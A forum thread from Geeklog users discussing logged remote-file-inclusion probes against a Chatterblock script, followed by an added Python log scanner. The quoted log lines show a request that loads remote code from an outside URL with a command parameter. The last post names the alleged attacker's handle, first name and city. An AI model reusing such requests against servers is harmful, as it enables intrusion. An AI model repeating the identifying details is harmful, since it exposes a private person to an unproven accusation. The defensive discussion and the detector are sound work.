
Geeklog Forums

Attention


Profetas

Anonymous
Attention: I have detected some attack attempts this morning, and they are coming from http://mail.omd.it/ using a cross script.

Here is the log file:
200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"

As you can see, they tried to use the cmd1.txt. If you check the following URL, http://mail.omd.it/cmd1.txt, you'll see the code, which I haven't examined yet.

Profetas

Anonymous
*censored* me, I think the omd has been hacked and the guy redirected the page to my site. If you go to http://omd.it it will go to my site. WTF

profetas

Forum User
Newbie
Registered: 05/05/04
Posts: 5
I have blocked them on my server, but something is going on. I didn't have my chatterblock enabled; that is what stopped them from uploading the exploit onto my server.

ill

Anonymous
Well spotted! Anyone got geeklog on a test server to check this out?

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
The cmd1.txt contains the C source code for a Linux kernel exploit. So it looks like, if this somehow gets executed, it's trying to compile and run that exploit (probably to get root access on the webserver).

Of course, anybody running a webserver on Linux should have updated their kernel by now (the exploit seems to be old) ...

I'm not sure what the Chatterblock does with that manipulated URL, so it's possible that it's not run at all. In any case, it wouldn't hurt to hide your Chatterblock from anonymous users (go to the Admin's blocks menu and uncheck the "Anonymous R" checkbox for the Chatterblock).

bye, Dirk

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
After a quick look through the source for cb_chatLog.php I have to doubt that anything was or would be executed here. The "show" parameter is used as a numeric value in the Chatterblock, doing some calculations, for example.

So to me, this looks pretty harmless.

We're actually seeing quite a lot of these attempts to stick URLs into parameters. But since Geeklog (and, it seems, the Chatterblock) won't visit those URLs on its own, these "hacking attempts" (if you can even call them that) won't accomplish anything.

bye, Dirk
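The URL-in-parameter probes described in the post above can be picked out of an access log. The following Python is an added example, not part of the original thread and not Geeklog code; the names `find_url_params`, `scan` and `SAMPLE_LOG` are assumptions, and only the first sample line comes from this thread (the other two are constructed).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself an absolute URL is the probe signature.
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# First line is the request quoted in this thread; the other two are constructed.
SAMPLE_LOG = [
    '200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/'
    'cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225',
    '192.0.2.10 - - [07/Jul/2004:21:40:02 +0100] '
    '"GET /chatterblock/cb_chatLog.php?show=20 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [07/Jul/2004:21:41:15 +0100] '
    '"GET /index.php?page=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 812',
]

def find_url_params(line):
    """Return a finding for a log line whose query string carries a URL as a
    parameter value, or None if the line is clean or does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes values, so encoded URLs are caught as well.
    hits = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if URL_VALUE_RE.match(v)]
    if not hits:
        return None
    return {"host": m.group("host"), "path": parts.path,
            "params": hits, "status": int(m.group("status"))}

def scan(lines):
    """Return the findings for every line that carries a URL-valued parameter."""
    return [f for f in map(find_url_params, lines) if f is not None]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        names = ", ".join(k for k, _ in f["params"])
        print(f'{f["host"]} {f["path"]} status={f["status"]} url-valued: {names}')
```

The status code is kept in each finding because a 404, as in the request from this thread, means the targeted script was not served at all, while a 200 is worth a closer look at how the script handles that parameter.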

Profetas

Anonymous
I found out who these people are.
His handle is magnific.
here
here
He's rooted a lot of machines, including the one he used to attack me.

His name is Rodrigo and I almost have the place where he studies. He lives in a city called Sao Jose dos Campos, SP; he is a Brazilian hacker.